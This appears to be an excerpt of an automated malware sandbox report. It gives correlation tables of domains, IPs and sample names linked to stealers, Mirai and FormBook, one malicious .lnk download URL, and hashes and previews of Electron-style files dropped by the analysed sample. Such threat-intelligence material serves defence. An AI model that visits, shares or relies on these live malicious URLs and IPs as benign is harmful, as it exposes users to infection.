                                                                                                                                              Document.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                https://download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop/Documents/Instruction_695-18014-012_Rev.PDF.lnkGet hashmaliciousUnknownBrowse

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  chrome.cloudflare-dns.comfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                  • 162.159.61.3
                                                                                                                                                  Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 172.64.41.3
                                                                                                                                                  Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 172.64.41.3
                                                                                                                                                  naukri-launcher 10.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 172.64.41.3
                                                                                                                                                  naukri-launcher 10.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 162.159.61.3
                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                  • 162.159.61.3
                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                  • 162.159.61.3
                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                  • 172.64.41.3
                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                  • 162.159.61.3
                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                  • 172.64.41.3

                                                                                                                                                  ASNs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                  • 104.21.35.43
                                                                                                                                                  https://app.seesaw.me/pages/shared_item?item_id=item.458620ed-6ab6-4874-8a90-aa31b75d3cd6&share_token=lEkLLLT6TUehqWhupDFOAA&mode=shareGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                  • 1.1.1.1
                                                                                                                                                  https://honorlock4.myopenlms.net/login/?lang=en_usGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 1.1.1.1
                                                                                                                                                  https://dsc.searcharchiver.com?e4d76cbb41e4ca0c204c490b8467d2b2=h1xaxfnhx1tbvfqneqqwbw9cq1pqrldzu1zdxflcw1peuvqjdb0luyknny4nnikow1fcvffcki9buujcpkrfxls+qlxrrdbew1fdm1k3kl00wtdcuitfxltzlsltqfpal1exwljdvyxzu0rcrxchdwupfwa+hqttww==&q=0418139282Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.18.29.55
                                                                                                                                                  77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                  • 172.67.177.134
                                                                                                                                                  https://docs.google.com/presentation/d/e/2PACX-1vTBMx4bSFDj_B_GCJTdTqUpVgpLXyQPR3uFGYP9j81KKHswOSbzMWDM5ZByYtVAwpACe-iOzHmzehje/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.18.95.41
                                                                                                                                                  Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 172.67.155.214
                                                                                                                                                  SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 104.21.74.79
                                                                                                                                                  Quotation Request-349849.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 172.67.137.47
                                                                                                                                                  http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.20.2.69
                                                                                                                                                  DE-FIRSTCOLOwwwfirst-colonetDEcopia111224mp.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 159.100.18.13
                                                                                                                                                  boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 31.172.83.147
                                                                                                                                                  boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 31.172.83.147
                                                                                                                                                  boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 31.172.83.147
                                                                                                                                                  nanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                  • 159.100.18.192
                                                                                                                                                  boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 31.172.83.147
                                                                                                                                                  boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 31.172.83.147
                                                                                                                                                  boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 31.172.83.147
                                                                                                                                                  boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 31.172.83.147
                                                                                                                                                  boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 31.172.83.147

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\d3dcompiler_47.dllnanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    9VbeqQbgU4.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                      9VbeqQbgU4.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                        ivySCI-5.6.3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          ivySCI-5.6.3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            MayitaV16.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              Xa04iTOvv5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3008
                                                                                                                                                                      Entropy (8bit):5.484142676712211
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:HizsSU4y4RQmFoUeCamfm9qr9t5/78NQffii+RlxJZKaVEouYAgwd64rHLjtvWb:HizlHyIFKL2O9qrh7KWKjJ5Eo9Adrxe
                                                                                                                                                                      MD5:E7F4E6A95A236D39879502C061681196
                                                                                                                                                                      SHA1:24DC89D9FDA1A285757442BCBDEEDEFFE779FA1E
                                                                                                                                                                      SHA-256:F38727DE6011B26D09FB467B398CA19B8BD6608E30A542808D9A123D9ED26DA6
                                                                                                                                                                      SHA-512:AE0236BFCCB832B2BAE65FB3D524A45B7F0583D6C963381E3EC64F9EA8B336AD36279EF810B674CCC991B46ABFB383B2F39292761647283B1CE11F1EE30BD749
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:@...e.................................$.3............@..........H..............@-....f.J.|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):160084992
                                                                                                                                                                      Entropy (8bit):6.744040501876811
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1572864:/LBZB52nvuZ7wVuMbgR7Sp6kYdEctmhoLsPagBsgkx52HYhwj+vfIBUdoJnP9Dj0:/ypCmJctBjj2+Jv
                                                                                                                                                                      MD5:4DE03596272B7D7B70FF34893D072F21
                                                                                                                                                                      SHA1:BC07189E5B35BC6AE9319E07ED107EDCA583231E
                                                                                                                                                                      SHA-256:1D8AB53874B2EDFB058DD64DA8A61D92C8A8E302CC737155E0D718DBE169BA36
                                                                                                                                                                      SHA-512:9C63702A0F07E2104C161036CE269CF7C4516DFC97C1D9DF979FE42757D6020CACDC2186AF8BDA9E6EAAB7D010D882372F52553CB5EBC7F890A84137D1654A40
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........."......0...T.......F.........@..........................................`...........................................+.. ..0"..h............Pt.._@..........P.......!.......................!.(... Q..@...........@8......`.*......................text...:/.......0.................. ..`.rdata..h.n..@....n..4..............@..@.data....TB...1.......1.............@....pdata..._@..Pt..`@...9.............@..@.00cfg..0.............z.............@..@.gxfg...pA.......B....z.............@..@.retplne.............Dz..................rodata...... .......Fz............. ..`.tls.........@.......Xz.............@...CPADinfo8....P.......\z.............@...LZMADEC......`.......^z............. ..`_RDATA..\............pz.............@..@malloc_h+............rz............. ..`.rsrc................xz.............@..@.reloc......P........|.............@..B................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\LICENSE.electron.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1096
                                                                                                                                                                      Entropy (8bit):5.13006727705212
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                      MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                      SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                      SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                      SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\LICENSES.chromium.html

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8312662
                                                                                                                                                                      Entropy (8bit):4.705814170451806
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:dbTy6TU675kfWScRQfJw91SmfJB6i6e6R626X8HHdE/pG6:tygpj
                                                                                                                                                                      MD5:312446EDF757F7E92AAD311F625CEF2A
                                                                                                                                                                      SHA1:91102D30D5ABCFA7B6EC732E3682FB9C77279BA3
                                                                                                                                                                      SHA-256:C2656201AC86438D062673771E33E44D6D5E97670C3160E0DE1CB0BD5FBBAE9B
                                                                                                                                                                      SHA-512:DCE01F2448A49A0E6F08BBDE6570F76A87DCC81179BB51D5E2642AD033EE81AE3996800363826A65485AB79085572BBACE51409AE7102ED1A12DF65018676333
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title" style="float:left;">Credits</span>.<a id="print-link" href="#" style="float:right;" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may us

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\chrome_100_percent.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):127125
                                                                                                                                                                      Entropy (8bit):7.915612661029362
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:vlKzwqCT4wDNzIwL2o418Gb0+VRLf0ld0GY3cQ39Vm2I:vlKzwt4uEgK18Gb0OV8ld0GecQ3f2
                                                                                                                                                                      MD5:ACD0FA0A90B43CD1C87A55A991B4FAC3
                                                                                                                                                                      SHA1:17B84E8D24DA12501105B87452F86BFA5F9B1B3C
                                                                                                                                                                      SHA-256:CCBCA246B9A93FA8D4F01A01345E7537511C590E4A8EFD5777B1596D10923B4B
                                                                                                                                                                      SHA-512:3E4C4F31C6C7950D5B886F6A8768077331A8F880D70B905CF7F35F74BE204C63200FF4A88FA236ABCCC72EC0FC102C14F50DD277A30F814F35ADFE5A7AE3B774
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..............t...#.....:.I...J~p...K~6...L~....M~#...N~....O~`...P~m...Q~....R~....S~I...T~....U~'"..V~.,..^~.7.._~;9..b~v:..c~(<..j~.<..k~.B..l~fH..m~.J..n~.K..o~.L.....M.....N....aP....IS....BV....uY.....]....Pa.....d....h....i...hk....l....m...An....n.....................................K.....x...........4.....m.....D.............................1........................'.....*.....4.....>.....C.....D....hM.....U.....V....>X.....Z....E].....]....a...%c....d....f....h....i....k....l....o...wq....t...7v....y....}....~...m................................3.................g.....6............................k.....-...........3.....9......................H.......................Y.................{.....s....M..............F...................&....y..............\....p....Z.........Z.........g...........................T..................6...............M.................r...........1.................X.................u.......

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\chrome_200_percent.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):177406
                                                                                                                                                                      Entropy (8bit):7.939611912805236
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:4DQYaEQN6AJPKNzIwafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+HxNK/rIM0:4DQYaNN68QEVgx5GMRejnbdZnVE6YopY
                                                                                                                                                                      MD5:4610337E3332B7E65B73A6EA738B47DF
                                                                                                                                                                      SHA1:8D824C9CF0A84AB902E8069A4DE9BF6C1A9AAF3B
                                                                                                                                                                      SHA-256:C91ABF556E55C29D1EA9F560BB17CC3489CB67A5D0C7A22B58485F5F2FBCF25C
                                                                                                                                                                      SHA-512:039B50284D28DCD447E0A486A099FA99914D29B543093CCCDA77BBEFDD61F7B7F05BB84B2708AE128C5F2D0C0AB19046D08796D1B5A1CFF395A0689AB25CCB51
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..............t...#.....:.t...J~....K~....L~....M~....N~....O~....P~.%..Q~.*..R~.-..S~c5..T~.9..U~.A..V~.V..^~Ck.._~.m..b~)o..c~yr..j~#s..k~.}..l~....m~...n~...o~......................................K.....!..................Q..............*........................a.......................,%....H0.....2....E:....(A.....F.....L.....R.....T....QY....:].....f.....i....br....Sv..........C...........).................].....}................................................................................................. ....!....%.....*.....,..........O/...../....y1.....2....l4.....6.....7....A:.....?.....C.....K.....S.....Y....._.....e....Ok.....l.....m.....n.....o.....q.....r.....s.....u....:w..............P............................%.............7................,........G........u.............B........S.........a....%........;.....................l...........T..........R...........6..........).............

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\d3dcompiler_47.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4916712
                                                                                                                                                                      Entropy (8bit):6.398049523846958
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l
                                                                                                                                                                      MD5:2191E768CC2E19009DAD20DC999135A3
                                                                                                                                                                      SHA1:F49A46BA0E954E657AAED1C9019A53D194272B6A
                                                                                                                                                                      SHA-256:7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
                                                                                                                                                                      SHA-512:5ADCB00162F284C16EC78016D301FC11559DD0A781FFBEFF822DB22EFBED168B11D7E5586EA82388E9503B0C7D3740CF2A08E243877F5319202491C8A641C970
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                      • Filename: nanophanotool.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: 9VbeqQbgU4.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: 9VbeqQbgU4.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: ivySCI-5.6.3.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: ivySCI-5.6.3.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: MayitaV16.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Xa04iTOvv5.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: ArenaWarsSetup.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: ArenaWarsSetup.exe, Detection: malicious, Browse
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d...^.}`.........." ......8..........<).......................................K.....:FK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\ffmpeg.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2883072
                                                                                                                                                                      Entropy (8bit):6.697367886822868
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:YGJO72cNsdMZWfAn1fdmZMOqcQrGhjUHgNxGUwSCmmfYDJGz5SN3lzl3hSKqH:Jj8n1QqGCmmfIUz59t
                                                                                                                                                                      MD5:E096C168B79A56DED0DF1AA142D9F1DA
                                                                                                                                                                      SHA1:318F20DAB294A315BD935160E9417FB5B28300F5
                                                                                                                                                                      SHA-256:65CC75329D17EC264E7A2DB571EA55F918394241445EA64569A56C75D0CFDC60
                                                                                                                                                                      SHA-512:3DCCF6CE85EF7E75690A5851642F10BB5E6E1572E91E933BACB7FCBFE405B0412B94BA0E160C3BA8D68D2B9AFC1DA268F61C83DCCD6453D8C9470931EE900BFD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$#..................................................@B...........`A..........................................*.......*.(.............@...............B..3....).......................).(....R#.@............"*.P............................text....##......$#................. ..`.rdata..l....@#......(#.............@..@.data...x.....*.."....*.............@....pdata........@.......*.............@..@.00cfg..8.....A.......+.............@..@.gxfg....,....A.......+.............@..@.retplne......A.......+..................tls..........A.......+.............@..._RDATA..\.....A.......+.............@..@.reloc...3....B..4....+.............@..B........................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\icudtl.dat

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):10542048
                                                                                                                                                                      Entropy (8bit):6.277141340322909
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:OKPBQYOo+ddlymOk25flQCUliXUxiG9Ha93Whla6ZGdnp/8k:OKPBhORjOhCliXUxiG9Ha93Whla6ZGrn
                                                                                                                                                                      MD5:D89CE8C00659D8E5D408C696EE087CE3
                                                                                                                                                                      SHA1:49FC8109960BE3BB32C06C3D1256CB66DDED19A8
                                                                                                                                                                      SHA-256:9DFBE0DAD5C7021CFE8DF7F52458C422CBC5BE9E16FF33EC90665BB1E3F182DE
                                                                                                                                                                      SHA-512:DB097CE3EB9E132D0444DF79B167A7DCB2DF31EFFBBD3DF72DA3D24AE2230CC5213C6DF5E575985A9918FBD0A6576E335B6EBC12B6258BC93FA205399DE64C37
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .Q....B.......B...#...B.. $...B..p$...B...$...B...%...B..`P...C...P...C...Q..(C......<C.....OC......bC..@...uC.......C..P....C.......C.......C..p....C.. ....C.......C.......D..p... D.....3D..0...FD.....YD.....lD.......D......D..0....D.......D..p....D......D..@....D.......E......E..@...*E.....=E..P...NE......bE.....rE..@....E.......E.......E..P....E.......E......E..@....F.......F.....'F..0...7F..P...JF......aF......qF...G...F.. H...F..`K...F...K...F...L...F...-...F...c...G....'.'G....'.>G..@.'.UG..0.'.oG....'..G...!'..G...!'..G..P&'..G...)'..G..@*'..H..`.(..H...e).7H..0.).VH...)*.xH....*..H....*..H...P+..H...Y+..H...Z+..I...]+. I..`^+.9I.. .+.UI....+.lI....+..I..P.-..I...=...I.......I.......I.. ....J..p....J......-J..p...EJ......ZJ......rJ..`....J..@....J.......J.......J..0....J.......J.......J..0....K..@....K..../.2K...,/.GK..../.\K..

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libEGL.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):481280
                                                                                                                                                                      Entropy (8bit):6.330677392522242
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:F9L2FFtoVsruIzUEzUST6uHKw+BubaOQ74PlqF8:F9CGafznzUSTRY70I
                                                                                                                                                                      MD5:1EECFB04C4434F5A813C8F0C0C8F2C88
                                                                                                                                                                      SHA1:6DC3CA4B3F72E7FB33BA26FA488DE323EDB59ADD
                                                                                                                                                                      SHA-256:897CEB95FB164640DDD2426673997B5F6FC2619FD916B038B575A70A0682A706
                                                                                                                                                                      SHA-512:D7818A42A76508AC3150AEA8D4E168B2DB36F55F71983A177002086380A82E307624CFE37B01FFC3D7EB407485D182654D0D7C6A0C06CCAAE60666630469C7E0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$................................................................`A........................................00......F>..(.......x.... ...C..............0....(.......................'..(...@A..@...........pA...............................text....".......$.................. ..`.rdata.......@.......(..............@..@.data....L....... ..................@....pdata...C... ...D..................@..@.00cfg..8....p......................@..@.gxfg...`$.......&..................@..@.retplne.............>...................tls....!............@..............@..._RDATA..\............B..............@..@.rsrc...x............D..............@..@.reloc..0............J..............@..B................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libGLESv2.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7625728
                                                                                                                                                                      Entropy (8bit):6.463180789552528
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:U8qvGdDtslh+LD3ZDWfnSvBSDU5bPm3k89Ld3gsOMt/:JD3ZXJ7bPWLWsD/
                                                                                                                                                                      MD5:CBA2436016F7A2838588A52D5B6F30F1
                                                                                                                                                                      SHA1:81DDF44B3E122DFBEE1A2CD8D4544364F1A621A4
                                                                                                                                                                      SHA-256:BCB3A3D2FCA3C33FA3D1D5DC976AA913CDC8001DF8E64C2CD3D2C545245141BF
                                                                                                                                                                      SHA-512:D92A880B5F83C5AE10AE9A83E38A293BB0E8C7659DD6ECE162FC752D57C9FCDE8036B81B023CD9F0F4F32B95B06FD4C366E20301010354B6CB904398A3149A44
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......Z...........M......................................`u...........`A..........................................k.8.....l.d....pt.......q.lO............t......vk.....................huk.(.....Z.@.............l.......k.@....................text...e.Z.......Z................. ..`.rdata..l.....Z.......Z.............@..@.data.........m..|....m.............@....pdata..lO....q..P....q.............@..@.00cfg..8.....t......Ps.............@..@.gxfg....+....t..,...Rs.............@..@.retplne.....@t......~s..................tls....:....Pt.......s.............@..._RDATA..\....`t.......s.............@..@.rsrc........pt.......s.............@..@.reloc........t.......s.............@..B................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\locales\af.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):377708
                                                                                                                                                                      Entropy (8bit):5.4079285675542845
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:ebGJWQdLX/Wi6fR9a5DhZ2FQPnUGSBhjA636Zi2Jyn9Ybt5KXpgmLwSVxJsVxSjf:6GJW2bOi6fRmZ2OPnUThjA636Zi2Jynd
                                                                                                                                                                      MD5:7E51349EDC7E6AED122BFA00970FAB80
                                                                                                                                                                      SHA1:EB6DF68501ECCE2090E1AF5837B5F15AC3A775EB
